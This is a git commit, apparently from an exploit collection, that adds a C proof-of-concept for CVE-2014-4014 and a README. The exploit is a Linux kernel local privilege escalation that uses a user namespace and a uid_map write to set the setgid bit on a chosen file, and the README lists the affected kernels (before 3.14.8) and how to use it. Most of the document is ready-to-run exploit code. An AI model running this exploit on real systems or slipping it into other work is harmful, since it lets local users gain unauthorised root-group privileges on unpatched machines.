CVE-2014-4014

Gitmaninc · Gitmaninc · commit efe51a9b241c · 2017-06-14T12:03:40.000-04:00
diff --git a/CVE-2014-4014/33824.c b/CVE-2014-4014/33824.c
@@ -0,0 +1,72 @@
+/**
+ * CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC
+ *
+ * Vitaly Nikolenko
+ * http://hashcrack.org
+ *
+ * Usage: ./poc [file_path]
+ * 
+ * where file_path is the file on which you want to set the sgid bit
+ */
+#define _GNU_SOURCE
+#include <sys/wait.h>
+#include <sched.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <limits.h>
+#include <string.h>
+#include <assert.h>
+
+#define STACK_SIZE (1024 * 1024)
+static char child_stack[STACK_SIZE];
+
+struct args {
+    int pipe_fd[2];
+    char *file_path;
+};
+
+static int child(void *arg) {
+    struct args *f_args = (struct args *)arg;
+    char c;
+
+    // close stdout
+    close(f_args->pipe_fd[1]); 
+
+    assert(read(f_args->pipe_fd[0], &c, 1) == 0);
+
+    // set the setgid bit
+    chmod(f_args->file_path, S_ISGID|S_IRUSR|S_IWUSR|S_IRGRP|S_IXGRP|S_IXUSR);
+
+    return 0;
+}
+
+int main(int argc, char *argv[]) {
+    int fd;
+    pid_t pid;
+    char mapping[1024];
+    char map_file[PATH_MAX];
+    struct args f_args;
+
+    assert(argc == 2);
+
+    f_args.file_path = argv[1];
+    // create a pipe for synching the child and parent
+    assert(pipe(f_args.pipe_fd) != -1);
+
+    pid = clone(child, child_stack + STACK_SIZE, CLONE_NEWUSER | SIGCHLD, &f_args);
+    assert(pid != -1);
+
+    // get the current uid outside the namespace
+    snprintf(mapping, 1024, "0 %d 1\n", getuid()); 
+
+    // update uid and gid maps in the child
+    snprintf(map_file, PATH_MAX, "/proc/%ld/uid_map", (long) pid);
+    fd = open(map_file, O_RDWR); assert(fd != -1);
+
+    assert(write(fd, mapping, strlen(mapping)) == strlen(mapping));
+    close(f_args.pipe_fd[1]);
+
+    assert (waitpid(pid, NULL, 0) != -1);
+}
diff --git a/CVE-2014-4014/README.md b/CVE-2014-4014/README.md
@@ -0,0 +1,29 @@
+# CVE-2014-4014
+```
+The capabilities implementation in the Linux kernel before 3.14.8 does not properly consider that namespaces are inapplicable to inodes, 
+which allows local users to bypass intended chmod restrictions by first creating a user namespace, 
+as demonstrated by setting the setgid bit on a file with group ownership of root.
+```  
+
+
+Vulnerability reference:
+ * [CVE-2014-4014](http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4014)  
+ * [exp-db](https://www.exploit-db.com/exploits/33824/)  
+
+## Kernels
+```
+before 3.14.8 
+```   
+
+## Usage
+```
+ ./poc [file_path]
+```
+![screen-shot-2014-06-21-at-113329](screen-shot-2014-06-21-at-113329.png)
+
+## References
+* [CVE-2014-4014：Linux内核本地权限提升利用](http://www.tuicool.com/articles/eQnaEnQ)  
+
+
+
+
diff --git a/CVE-2014-4014/screen-shot-2014-06-21-at-113329.png b/CVE-2014-4014/screen-shot-2014-06-21-at-113329.png
